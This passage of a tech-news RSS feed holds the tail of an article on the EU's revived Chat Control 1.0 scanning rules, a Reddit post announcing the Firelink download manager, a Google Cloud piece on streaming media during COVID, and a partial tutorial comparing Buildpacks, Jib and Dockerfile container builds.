<p data-start="2086" data-end="2411">The <a href="https://cdt.org/insights/return-of-mass-scanning-of-private-communications-through-undemocratic-procedure/" target="_blank" rel="nofollow noopener">renewed proposal</a> followed an urgent legislative process that critics described as highly unusual. According to CDT Europe, the Parliament had previously rejected a similar proposal in March, but the issue returned through a fast-tracked second-reading procedure supported by European Parliament President Roberta Metsola.</p>
<p data-start="2413" data-end="2732">Because the proposal was treated as a second reading, opponents needed at least 361 votes to block it. While a simple majority supported rejecting the measure during voting, it did not reach the higher threshold required under the urgent procedure. Reduced attendance before the summer recess also affected the outcome.</p>
<p data-start="2734" data-end="2854">Only two amendments were adopted during the process, both aimed at preserving protections for <a href="https://thecyberexpress.com/eu-agrees-on-child-sexual-abuse-detection-law/" target="_blank" rel="noopener">end-to-end encryption</a>.</p>

<h3 data-section-id="12ev3io" data-start="2856" data-end="2905"><strong>Debate Continues Over Permanent CSAM Framework</strong></h3>
<p data-start="2907" data-end="3163">The revival of Chat Control 1.0 comes shortly after negotiations on the proposed Child Sexual Abuse Material Regulation (CSAR) ended without agreement on June 29. Discussions on the permanent framework are expected to resume after the summer break.</p>
<p data-start="3165" data-end="3464">CDT Europe argued that restoring the temporary regulation could complicate ongoing negotiations over the long-term legislative framework. The organization said questions surrounding voluntary or mandatory scanning require careful legal and technical assessment before permanent rules are introduced.</p>

<h3 data-section-id="qt09lz" data-start="3466" data-end="3511"><strong>Questions Raised Over the Need for Urgency</strong></h3>
<p data-start="3513" data-end="3707">Supporters of the urgent procedure argued that allowing the temporary regulation to expire would create an immediate regulatory gap for online platforms investigating <a href="https://thecyberexpress.com/eu-csam-law-gap-child-sexual-exploitation-risk/" target="_blank" rel="noopener">child sexual abuse content</a>.</p>
<p data-start="3709" data-end="3967">However, CDT Europe challenged that justification, pointing to statements from the German Federal Police, which reportedly acknowledged there was no direct connection between the expiration of the temporary regulation and the number of CSAM reports received.</p>
<p data-start="3969" data-end="4405">The organization also noted that several legal mechanisms remain available even without the temporary derogation. These include targeted telecommunications surveillance with judicial authorization, electronic evidence preservation under the EU's e-evidence framework, existing content removal and reporting processes under the <a href="https://thecyberexpress.com/dsa-child-protection-investigation/" target="_blank" rel="noopener">Digital Services Act</a>, and hash-matching technology that identifies previously verified CSAM for human review.</p>

<h3 data-section-id="1eca2tw" data-start="4407" data-end="4433"><strong>Privacy Concerns Remain</strong></h3>
<p data-start="4435" data-end="4783">Following the vote, CDT Europe said it opposed both the outcome and the legislative process used to restore the regulation. The organization stated it would continue advocating for a future Child Sexual Abuse Material Regulation (CSAR) that rejects indiscriminate mass scanning while protecting end-to-end encryption and fundamental rights.</p>
<p data-start="4785" data-end="5027">The renewed Chat Control 1.0 regulation restores the legal framework for voluntary scanning by online platforms, but the broader debate over balancing child protection, privacy, and digital rights in the European Union remains unresolved.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Firelink: Modern cross-platform download manager with support for media fetch/download]]></title>
<description><![CDATA[Hello! This project began as a fun vibe coding Swift app for Mac, but it quickly evolved into a comprehensive learning experience as I aimed to make it cross-platform. I completely revamped the application from scratch, this time using Rust and Tuari. It was quite a journey, but I’m excited to sh...]]></description>
<link>https://tsecurity.de/de/3663265/linux-tipps/firelink-modern-cross-platform-download-manager-with-support-for-media-fetchdownload/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3663265/linux-tipps/firelink-modern-cross-platform-download-manager-with-support-for-media-fetchdownload/</guid>
<pubDate>Sun, 12 Jul 2026 14:23:22 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>Hello!</p> <p>This project began as a fun vibe coding Swift app for Mac, but it quickly evolved into a comprehensive learning experience as I aimed to make it cross-platform.</p> <p>I completely revamped the application from scratch, this time using Rust and Tuari. It was quite a journey, but I’m excited to share the first stable version with you!</p> <p>Additionally, there’s Firefox and Chromium extension available for integration, which you can find on the GitHub page.</p> <h1>Features</h1> <ul> <li><strong>Fast segmented downloads</strong> powered by aria2 with configurable connections, retries, and speed limits.</li> <li><strong>Media extraction</strong> with yt-dlp, FFmpeg, and Deno for video/audio links and richer format selection.</li> <li><strong>A real Add window</strong> for manual, extension-captured, and media downloads, including metadata, duplicate handling, and save-location choices before downloads start.</li> <li><strong>Persistent queue management</strong> with safe concurrency limits, pause/resume, retry, redownload, sorting, multi-select, and bulk controls.</li> <li><strong>Download scheduling</strong> with start/stop windows, speed-limiter tools, and optional post-queue actions.</li> <li><strong>Smart organization</strong> through categories, default folders, per-download overrides, and open/reveal/trash actions.</li> <li><strong>Private browser handoff</strong> through authenticated local pairing with replay protection and desktop-server proof checks.</li> <li><strong>Native desktop integration</strong> including tray controls, notifications, completion sounds, sleep prevention, and OS keychain support where available.</li> <li><strong>Diagnostics</strong> built in with engine health checks, structured logs, and packaged-engine verification.</li> <li><strong>Firefox and Chromium Extension</strong>: <ul> <li>Automatic download capture for ordinary browser downloads.</li> <li>Media fetch from the extension popup or page context menu.</li> <li>Context-menu actions for single links and selected text containing links.</li> </ul></li> </ul> <p>Credits to Aria2, yt-dlp, FFmpeg, and Deno projects and their contributors that made this possible.</p> <p>Firelink release page: <a href="https://github.com/nimbold/Firelink/">https://github.com/nimbold/Firelink/</a></p> <p>Firefox-Extension: <a href="https://github.com/nimbold/Firelink-Extension">https://github.com/nimbold/Firelink-Extension</a></p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/NimBold"> /u/NimBold </a> <br> <span><a href="https://i.redd.it/lzzdkiqqkrch1.png">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1uuacup/firelink_modern_crossplatform_download_manager/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[Helping media companies navigate the new streaming normal]]></title>
<description><![CDATA[Editor’s note: An earlier version of this feature originally appeared on Next TV and TV Technology.From the explosion of new programming to the launch of high-profile streaming services, 2020 was on track to be a transformational year in media and entertainment. But at the same time, the industry...]]></description>
<link>https://tsecurity.de/de/3662852/it-security-nachrichten/helping-media-companies-navigate-the-new-streaming-normal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662852/it-security-nachrichten/helping-media-companies-navigate-the-new-streaming-normal/</guid>
<pubDate>Sun, 12 Jul 2026 08:07:18 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p><i><b>Editor’s note</b>: An earlier version of this feature originally appeared on <a href="https://www.nexttv.com/blogs/googles-anil-jain-how-media-companies-can-navigate-the-new-norm-with-cloud-technology" target="_blank">Next TV </a>and <a href="https://www.tvtechnology.com/opinion/googles-anil-jain-how-media-companies-can-navigate-the-new-norm-with-cloud-technology" target="_blank">TV Technology</a>.</i></p><p>From the explosion of new programming to the launch of high-profile streaming services, 2020 was on track to be a transformational year in media and entertainment. But at the same time, the industry fully expected many of its foundational elements—windowing strategies, live events, production standards—to stay the same.</p><p>All that changed with COVID-19. Suddenly, the future came early to the industry, with many facing difficult challenges like accelerating and evolving direct-to-consumer business models while at the same time keeping workers and productions physically distanced.</p><p>As media companies transition from short-term response to long-term planning, many are contemplating how different the industry might look in the months and years to come.</p><p>All this is the topic of our new guide,<a href="https://inthecloud.withgoogle.com/media-transformation-during-covid/dl-cd.html?utm_source=google&amp;utm_medium=email&amp;utm_campaign=-&amp;utm_content=mediapageevolution" target="_blank"> Accelerated Media Evolution In The Time Of COVID</a>, and the focus of our<a href="https://inthecloud.withgoogle.com/media-transformation-during-covid/dl-cd.html?utm_source=google&amp;utm_medium=email&amp;utm_campaign=-&amp;utm_content=mediapageevolution" target="_blank"> Media OnAir</a> events, where we’ll share insights from our work with leading media companies. For these organizations and others, we recommend keeping new audience behaviors top of mind and focusing on driving three key changes.</p><p><b>1. Scale new monetization channels and engage audiences through data </b></p><p></p><p>As audiences were stuck at home during the early stages of the pandemic, linear viewing saw a temporary increase in consumption—driven by specific formats such as news. But that consumption returned to pre-lockdown levels as restrictions were lifted in certain regions. </p><p>By contrast, many streaming subscription services saw consistent increased adoption. Nine percent of U.S. households took up a new SVOD service in Q2 2020.<sup>1</sup> The surge in streaming consumption seems to be more resilient than its linear counterpart, as U.S. time spent with streaming services in June 2020 was roughly 50 percent above its 2019 level.<sup>2</sup></p><p></p><p>In contrast to the Pay TV bundle, today’s streaming audiences have access to much more choice and freedom in their entertainment options. These viewers have shown both a preference to stack multiple services and a higher propensity to churn. As the pandemic affects discretionary spending across the world, audiences will look to save on entertainment costs, making SVOD services more attractive than traditional Pay TV bundles, as well as driving an increased adoption of AVOD services. </p><p>As a result, media organizations need to reassess how to streamline existing broadcast operations and costs. They must invest in building technology platforms that can handle unpredictable streaming demand seamlessly, while also deriving deeper audience insights from their data in order to drive audience engagement, retention, and monetization. For example, leading British broadcaster <a href="https://cloud.google.com/customers/itv">ITV</a>  built a video analytics solution on Google Cloud so they could better monitor events on their VOD service, ITV Hub.</p><p><b>2. Produce new content remotely and maximize the value of library content</b></p><p>While distribution channels may change, content still remains the industry’s crown jewel. Content breadth, exclusivity, and original content are the top three reasons that audiences adopt streaming services, and maximizing the value of both library and new content has never been more critical.</p><p>Content production has also been disrupted by the pandemic. Physical productions have paused across the world, only slowly starting to resume once again. And for content that has made it through the complex post-production process, the global shuttering of theatrical exhibition has forced many blockbuster titles to debut on streaming services—radically altering windowing strategies and the economic models that come with it. </p><p></p><p>Media companies have resorted to boundless creative strategies to keep content production lines open. Formats that can be created remotely such as animation are experiencing a boom, and live events such as news and sports have established new remote working processes in record time. </p><p>Content production has been on the rise for years, but the temporary halt in production has been a silver lining for media companies; this pause has presented an opportunity to step back and implement more digital, collaborative, streamlined, and global production and management processes, supported by the cloud. Media companies like <a href="https://www.youtube.com/watch?v=UwHcdmqXw8c" target="_blank">ViacomCBS</a> have also accelerated the digitization and enrichment of their extensive back catalogs and archives, to help fill the content gap. </p><p></p><p><b>3. Reimagine the workplace for the future of productivity</b></p><p>Finally, the biggest challenge many companies and industries face has been the shift to remote work. Innovative companies like <a href="https://youtu.be/87OzMmP2e0g" target="_blank">Yahoo Finance</a>, for example, utilized our video conferencing solution to keep their broadcast team’s content flowing and audiences engaged. 150 of Yahoo Finance’s editors, reporters, and anchors used Google Meet to deliver news and video streams on air from locations across the U.S. and London to tens of millions of viewers live, transitioning to a 100 percent remote broadcast model overnight. </p><p>As the industry navigates a new working norm, many media company offices will require thoughtful consideration of which tasks can be automated or done remotely, and exactly how much real estate is required to maintain operations. <br><br>Decisions are likely to be different by functions. Post-production staff, visual effects artists, and video editors can utilize <a href="https://www.youtube.com/watch?v=VjeRdQ9X5Vg" target="_blank">virtual workstations</a> and editing applications to complete their work remotely, while central teams such as finance, sales, and marketing can utilize video conferencing services like Meet to stay connected no matter where they are. But some essential personnel—lightweight studio production teams and on- prem playout teams—will need to still come into the office.<br><br><b>Continued innovation in the face of unprecedented change<br></b><br>Many media and entertainment companies are choosing Google Cloud operations modernization—all to thrive and remain relevant within this new era. For example, Major League Baseball adopted <a href="https://cloud.withgoogle.com/next/sf/sessions?session=APP228#business-application-platform" target="_blank">Anthos</a> as the vehicle to run their applications anywhere, utilized BigQuery to upgrade their <a href="https://technology.mlblogs.com/introducing-statcast-2020-hawk-eye-and-google-cloud-a5f5c20321b8" target="_blank">Statcast</a> platform, and launched new fan friendly initiatives like <a href="https://www.mlb.com/news/mlb-film-room-launch" target="_blank">Film Room</a> using our machine learning technologies—all in the service of becoming more agile and delivering more innovative fan experiences in a competitive media ecosystem. <br></p><p>This year has been one of unexpected and accelerated change for all, but the ingenuity, innovation, and determination of media companies to continue delivering critical news, information, and entertainment to audiences across the world has been extraordinary. Google Cloud is committed to bringing forward technologies that the media industry needs and to partner with our customers to help them continue to innovate in the face of unprecedented challenges. </p><p></p><p>To learn more, read our guide,<a href="https://inthecloud.withgoogle.com/media-transformation-during-covid/dl-cd.html?utm_source=google&amp;utm_medium=email&amp;utm_campaign=-&amp;utm_content=mediapageevolution" target="_blank"> Accelerated Media Evolution In The Time Of COVID</a>, or join us at one of our<a href="https://inthecloud.withgoogle.com/media-transformation-during-covid/dl-cd.html?utm_source=google&amp;utm_medium=email&amp;utm_campaign=-&amp;utm_content=mediapageevolution" target="_blank"> Media OnAir</a> events.</p><hr><p><i><sup>Sources:</sup></i></p><i><sup>1. Kantar, <a href="https://www.kantarworldpanel.com/global/News/Amazon-tops-Disney-Netflix-with-surge-in-video-service" target="_blank">Amazon tops Disney, Netflix with surge in video service</a> (August 2020)<br>2. Nielsen; The Hollywood Reporter, <a href="https://www.hollywoodreporter.com/live-feed/quarantine-tv-ratings-spike-is-1299998" target="_blank">The Quarantine TV Ratings Spike Is Over</a> (June 2020)</sup></i></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Buildpacks vs Jib vs Dockerfile: Comparing containerization methods]]></title>
<description><![CDATA[As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of ...]]></description>
<link>https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3662836/it-security-nachrichten/buildpacks-vs-jib-vs-dockerfile-comparing-containerization-methods/</guid>
<pubDate>Sun, 12 Jul 2026 08:06:57 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="block-paragraph"><p>As developers we work on source code, but production systems don't run source, they need a runnable thing. Starting many years ago, most enterprises were using Java EE (aka J2EE) and the runnable "thing" we would deploy to production was a ".jar", ".war", or ".ear" file. Those files consisted of the compiled Java classes and would run inside of a "container" running on the JVM. As long as your class files were compatible with the JVM and container, the app would just work.</p><p>That all worked great until people started building non-JVM stuff: Ruby, Python, NodeJS, Go, etc. Now we needed another way to package up apps so they could be run on production systems. To do this we needed some kind of virtualization layer that would allow anything to be run. Heroku was one of the first to tackle this and they used a Linux virtualization system called "lxc" - short for Linux Containers. Running a "container" on lxc was half of the puzzle because still a "container" needed to be created from source code, so Heroku invented what they called "Buildpacks" to create a standard way to convert source into a container.</p><p>A bit later a Heroku competitor named dotCloud was trying to tackle similar problems and went a different route which ultimately led to Docker, a standard way to create and run containers across platforms including Windows, Mac, Linux, Kubernetes, and Google Cloud Run. Ultimately the container specification behind Docker became a standard under the <a href="https://opencontainers.org/" target="_blank">Open Container Initiative (OCI)</a> and the virtualization layer switched from lxc to <a href="https://github.com/opencontainers/runc" target="_blank">runc</a> (also an OCI project).</p><p>The traditional way to build a Docker container is built into the <code>docker</code> tool and uses a sequence of special instructions usually in a file named <code>Dockerfile</code> to compile the source code and assemble the "layers" of a container image.</p><p>Yeah, this is confusing because we have all sorts of different "containers" and ways to run stuff in those containers. And there are also many ways to create the things that run in containers. The bit of history is important because it helps us categorize all of this into three parts:</p><ul><li>Container Builders - Turn source code into a Container Image</li><li>Container Images - Archive files containing a "runnable" application</li><li>Containers - Run Container Images</li></ul><p>With Java EE those three categories map to technologies like:</p><ul><li>Container Builders == Ant or Maven</li><li>Container Images == .jar, .war, or .ear</li><li>Containers == JBoss, WebSphere, WebLogic</li></ul><p>With Docker / OCI those three categories map to technologies like:</p><ul><li>Container Builders == Dockerfile, Buildpacks, or Jib</li><li>Container Images == .tar files usually not dealt with directly but through a "container registry"</li><li>Containers == Docker, Kubernetes, Cloud Run</li></ul><h3>Java Sample Application</h3>Let's explore the Container Builder options further on a little Java server application.  If you want to follow along, clone my <a href="https://github.com/jamesward/comparing-docker-methods" target="_blank">comparing-docker-methods project</a>:<p><code>git clone https://github.com/jamesward/comparing-docker-methods.git</code><br></p><p><code>cd comparing-docker-methods</code></p><p></p><p>In that project you'll see a basic Java web server in <code>src/main/java/com/google/WebApp.java</code> that just responds with "hello, world" on a GET request to <code>/</code>. Here is the source:<br></p><p></p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'package com.google;\r\n\r\nimport com.sun.net.httpserver.HttpServer;\r\nimport java.io.IOException;\r\nimport java.io.OutputStream;\r\nimport java.net.InetSocketAddress;\r\n\r\npublic class WebApp {\r\n\r\n  public static void main(String[] args) throws IOException {\r\n    int port = Integer.parseInt(System.getenv().getOrDefault("PORT", "8080"));\r\n    HttpServer server = HttpServer.create(new InetSocketAddress(port), 0);\r\n\r\n    server.createContext("/", handler -&gt; {\r\n      byte[] response = "hello, world".getBytes();\r\n      handler.sendResponseHeaders(200, response.length);\r\n      try (OutputStream os = handler.getResponseBody()) {\r\n        os.write(response);\r\n      }\r\n    });\r\n\r\n    System.out.println("Listening at http://localhost:" + port);\r\n\r\n    server.start();\r\n  }\r\n}'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860670&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>This project uses Maven with a minimal <code>pom.xml</code> build config file for compiling and running the Java server:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;?xml version="1.0" encoding="UTF-8"?&gt;\r\n&lt;project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"\r\n    xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd"&gt;\r\n  &lt;modelVersion&gt;4.0.0&lt;/modelVersion&gt;\r\n\r\n  &lt;groupId&gt;com.google&lt;/groupId&gt;\r\n  &lt;artifactId&gt;sample-java-mvn&lt;/artifactId&gt;\r\n  &lt;packaging&gt;jar&lt;/packaging&gt;\r\n  &lt;version&gt;0.1.0-SNAPSHOT&lt;/version&gt;\r\n\r\n  &lt;properties&gt;\r\n    &lt;maven.compiler.source&gt;8&lt;/maven.compiler.source&gt;\r\n    &lt;maven.compiler.target&gt;8&lt;/maven.compiler.target&gt;\r\n  &lt;/properties&gt;\r\n\r\n  &lt;build&gt;\r\n    &lt;plugins&gt;\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.codehaus.mojo&lt;/groupId&gt;\r\n        &lt;artifactId&gt;exec-maven-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;1.6.0&lt;/version&gt;\r\n        &lt;executions&gt;\r\n          &lt;execution&gt;\r\n            &lt;goals&gt;\r\n              &lt;goal&gt;java&lt;/goal&gt;\r\n            &lt;/goals&gt;\r\n          &lt;/execution&gt;\r\n        &lt;/executions&gt;\r\n        &lt;configuration&gt;\r\n          &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n\r\n      &lt;plugin&gt;\r\n        &lt;groupId&gt;org.apache.maven.plugins&lt;/groupId&gt;\r\n        &lt;artifactId&gt;maven-jar-plugin&lt;/artifactId&gt;\r\n        &lt;version&gt;3.2.0&lt;/version&gt;\r\n        &lt;configuration&gt;\r\n          &lt;archive&gt;\r\n            &lt;manifest&gt;\r\n              &lt;mainClass&gt;com.google.WebApp&lt;/mainClass&gt;\r\n            &lt;/manifest&gt;\r\n          &lt;/archive&gt;\r\n        &lt;/configuration&gt;\r\n      &lt;/plugin&gt;\r\n    &lt;/plugins&gt;\r\n  &lt;/build&gt;\r\n\r\n&lt;/project&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860c10&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>If you want to run this locally make sure you have Java 8 installed and from the project root directory, run:</p><p><code>./mvnw compile exec:java</code></p><p>You can test the server by visiting: <a href="http://localhost:8080/" target="_blank">http://localhost:8080</a></p><h3>Container Builder: Buildpacks</h3><p>We have an application that we can run locally so let's get back to those Container Builders. Earlier you learned that Heroku invented Buildpacks to create standard, polyglot ways to go from source to a Container Image. When Docker / OCI Containers started gaining popularity Heroku and Pivotal worked together to make their Buildpacks work with Docker / OCI Containers. That work is now a sandbox Cloud Native Computing Foundation project: <a href="https://buildpacks.io/" target="_blank">https://buildpacks.io/</a></p><p>To use Buildpacks you will need to <a href="https://docs.docker.com/get-started/" target="_blank">install Docker</a> and <a href="https://github.com/buildpacks/pack/releases" target="_blank">the pack tool</a>. Now from the command line tell Buildpacks to take your source and turn it into a Container Image:</p><p><code>pack build --builder=gcr.io/buildpacks/builder:v1 comparing-docker-methods:buildpacks</code></p><p>Magic! You didn't have to do anything and the Buildpacks knew how to turn that Java application into a Container Image. It even works on Go, NodeJS, Python, and .Net apps out-of-the-box. So what just happened?  Buildpacks inspect your source and try to identify it as something it knows how to build. In the case of our sample application it noticed the <code>pom.xml</code> file and decided it knows how to build Maven-based applications. The <code>--builder</code> flag told it where to get the Buildpacks from. In this case, <code>gcr.io/buildpacks/builder:v1</code> are the Container Image coordinates to <a href="https://cloud.google.com/blog/products/containers-kubernetes/google-cloud-now-supports-buildpacks">Google Cloud's Buildpacks</a>. Alternatively you could use the Heroku or Paketo Buildpacks. The parameter <code>comparing-docker-methods:buildpacks</code> is the Container Image coordinates for where to store the output. In this case it stores on the local docker daemon. You can now run that Container Image locally with <code>docker</code>:</p><p><code>docker run -it -ePORT=8080 -p8080:8080 comparing-docker-methods:buildpacks</code></p><p>Of course you can also run that Container Image anywhere that runs Docker / OCI Containers like Kubernetes and Cloud Run.</p><p>Buildpacks are nice because in many cases they just work and you don't have to do anything special to turn your source into something runnable. But the resulting Container Images created from Buildpacks can be a bit bulky. Let's use a tool called <a href="https://github.com/wagoodman/dive" target="_blank"><code>dive</code></a> to examine what is in the created container image:</p><p><code>dive comparing-docker-methods:buildpacks</code></p><p></p><p></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Dive_comparison.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>Here you can see the Container Image has 11 layers and a total image size of 319MB. With <code>dive</code> you can explore each layer and see what was changed. In this Container Image the first 6 layers are the base operating system. Layer 7 is the JVM and layer 8 is our compiled application. Layering enables great caching so if only layer 8 changes, then layers 1 through 7 do not need to be re-downloaded. One downside of Buildpacks is how (at least for now) all of the dependencies and compiled application code are stored in a single layer. It would be better to have separate layers for the dependencies and the compiled application.</p><p>To recap, Buildpacks are the easy option that "just works" right out-of-the-box. But the Container Images are a bit large and not optimally layered.</p><h3>Container Builder: Jib</h3><p>The open source <a href="https://github.com/GoogleContainerTools/jib" target="_blank">Jib project</a> is a Java library for creating Container Images with Maven and Gradle plugins. To use it on a Maven project (like the one we from above), just add a build plugin to the <code>pom.xml</code> file:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', '&lt;plugin&gt;\r\n    &lt;groupId&gt;com.google.cloud.tools&lt;/groupId&gt;\r\n    &lt;artifactId&gt;jib-maven-plugin&lt;/artifactId&gt;\r\n    &lt;version&gt;2.6.0&lt;/version&gt;\r\n&lt;/plugin&gt;'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d30&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>Now a Container Image can be created and stored in the local docker daemon by running:</p><p><code>./mvnw compile jib:dockerBuild -Dimage=comparing-docker-methods:jib</code></p><p>Using <code>dive</code> we will see that the Container Image for this application is now only 127MB thanks to slimmer operating system and JVM layers. Also, on a Spring Boot application we can see how Jib layers the dependencies, resources, and compiled application for better caching:</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Spring_Boot_Application.max-1000x1000.png" alt="Spring Boot Application">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>In this example the 18MB layer contains the runtime dependencies and the final layer contains the compiled application. Unlike with Buildpacks the original source code is not included in the Container Image. Jib also has a great feature where you can use it without docker being installed, as long as you store the Container Image on an external Container Registry (like DockerHub or the Google Cloud Container Registry). Jib is a great option with Maven and Gradle builds for Container Images that use the JVM.</p><h3>Container Builder: Dockerfile</h3><p>The traditional way to create Container Images is built into the <code>docker</code> tool and uses a sequence of instructions defined in a file usually named <code>Dockerfile</code>. Here is a <code>Dockerfile</code> you can use with the sample Java application:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM adoptopenjdk/openjdk8 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nFROM adoptopenjdk/openjdk8:jre\r\n\r\nCOPY --from=builder /app/target/*.jar /server.jar\r\n\r\nCMD ["java", "-jar", "/server.jar"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860d90&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>In this example, the first four instructions start with the AdoptOpenJDK 8 Container Image and build the source to a Jar file. The final Container Image is created from the AdoptOpenJDK 8 JRE Container Image and includes the created Jar file. You can run <code>docker</code> to create the Container Image using the <code>Dockerfile</code> instructions:</p><p><code>docker build -t comparing-docker-methods:dockerfile </code></p><p>Using <code>dive</code> we can see a pretty slim Container Image at 209MB:<br></p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      ">

      
      
        
        <img src="https://storage.googleapis.com/gweb-cloudblog-publish/images/Container_image.max-1000x1000.png" alt="Container Image">
        
        
      
    </figure>

  
      </div>
    </div>
  




</div>
<div class="block-paragraph"><p>With a <code>Dockerfile</code> we have full control over the layering and base images. For example, we could use the <a href="https://github.com/GoogleContainerTools/distroless/tree/master/java" target="_blank">Distroless Java base image</a> to trim down the Container Image even further. This method of creating Container Images provides a lot of flexibility but we do have to write and maintain the instructions.</p><p>With this flexibility we can do some cool stuff. For example, we can use GraalVM to create a "native image" of our application. This is an ahead-of-time compiled binary which can reduce startup time, reduce memory usage, and alleviate the need for a JVM in the Container Image. And we can go even further and create a statically linked native image which includes everything needed to run so that even an operating system is not needed in the Container Image. Here is the Dockerfile to do that:</p></div>
<div class="block-code"><dl>
    <dt>code_block</dt>
    <dd>&lt;ListValue: [StructValue([('code', 'FROM oracle/graalvm-ce:20.2.0-java11 as builder\r\n\r\nWORKDIR /app\r\nCOPY . /app\r\n\r\nRUN gu install native-image\r\n\r\n# BEGIN PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n# SEE: https://github.com/oracle/graal/blob/master/substratevm/StaticImages.md\r\nARG RESULT_LIB="/staticlibs"\r\n\r\nRUN mkdir ${RESULT_LIB} &amp;&amp; \\\r\n    curl -L -o musl.tar.gz https://musl.libc.org/releases/musl-1.2.1.tar.gz &amp;&amp; \\\r\n    mkdir musl &amp;&amp; tar -xvzf musl.tar.gz -C musl --strip-components 1 &amp;&amp; cd musl &amp;&amp; \\\r\n    ./configure --disable-shared --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /muscl &amp;&amp; rm -f /musl.tar.gz &amp;&amp; \\\r\n    cp /usr/lib/gcc/x86_64-redhat-linux/4.8.2/libstdc++.a ${RESULT_LIB}/lib/\r\n\r\nENV PATH="$PATH:${RESULT_LIB}/bin"\r\nENV CC="musl-gcc"\r\n\r\nRUN curl -L -o zlib.tar.gz https://zlib.net/zlib-1.2.11.tar.gz &amp;&amp; \\\r\n   mkdir zlib &amp;&amp; tar -xvzf zlib.tar.gz -C zlib --strip-components 1 &amp;&amp; cd zlib &amp;&amp; \\\r\n   ./configure --static --prefix=${RESULT_LIB} &amp;&amp; \\\r\n    make &amp;&amp; make install &amp;&amp; \\\r\n    cd / &amp;&amp; rm -rf /zlib &amp;&amp; rm -f /zlib.tar.gz\r\n#END PRE-REQUISITES FOR STATIC NATIVE IMAGES FOR GRAAL 20.2.0\r\n\r\nRUN ./mvnw compile jar:jar\r\n\r\nRUN native-image \\\r\n  --static \\\r\n  --libc=musl \\\r\n  --no-fallback \\\r\n  --no-server \\\r\n  --install-exit-handlers \\\r\n  -H:Name=webapp \\\r\n  -cp /app/target/*.jar \\\r\n  com.google.WebApp\r\n\r\nFROM scratch\r\n\r\nCOPY --from=builder /app/webapp /webapp\r\n\r\nENTRYPOINT ["/webapp"]'), ('language', ''), ('caption', &lt;wagtail.rich_text.RichText object at 0x7f58aa860df0&gt;)])]&gt;</dd>
</dl></div>
<div class="block-paragraph"><p>You will see there is a bit of setup needed to support static native images. After that setup the Jar is compiled like before with Maven. Then the <code>native-image</code> tool creates the binary from the Jar. The <code>FROM scratch</code> instruction means the final container image will start with an empty one. The statically linked binary created by <code>native-image</code> is then copied into the empty container.</p><p>Like before you can use <code>docker</code> to build the Container Image:</p><p><code>docker build -t comparing-docker-methods:graalvm .</code></p><p>Using <code>dive</code> we can see the final Container Image is only 11MB!</p></div>
<div class="block-image_full_width">






  
    <div class="article-module h-c-page">
      <div class="h-c-grid">
  

    <figure class="article-image--large
      
      
        h-c-grid__col
